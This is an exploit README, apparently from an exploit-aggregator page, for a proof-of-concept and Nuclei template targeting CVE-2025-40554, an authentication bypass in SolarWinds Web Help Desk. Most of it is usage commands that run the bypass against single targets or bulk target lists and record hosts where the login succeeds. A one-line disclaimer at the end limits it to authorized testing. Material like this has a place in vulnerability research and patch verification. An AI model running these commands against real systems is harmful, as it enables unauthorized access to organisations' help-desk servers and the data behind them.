## https://sploitus.com/exploit?id=A7ACD41C-8E71-5449-A264-B9C80754DC4E
# CVE-2025-40554 โ SolarWinds Web Help Desk Auth Bypass PoC
Proof-of-concept and Nuclei template for **CVE-2025-40554** (SolarWinds Web Help Desk authentication bypass
Nuclei:**
```bash
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
```
```bash
pip install -r requirements.txt
```
**Single target (bypass + login):**
```bash
python3 exploit_auth_bypass.py -t https://TARGET:8443
```
**Single target, bypass only (no login):**
```bash
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
```
**Target list (saves vulnerable+login only to `vulnerable_login.txt`):**
```bash
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
```
## Disclaimer
This PoC is for **authorized security research and testing only**. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse.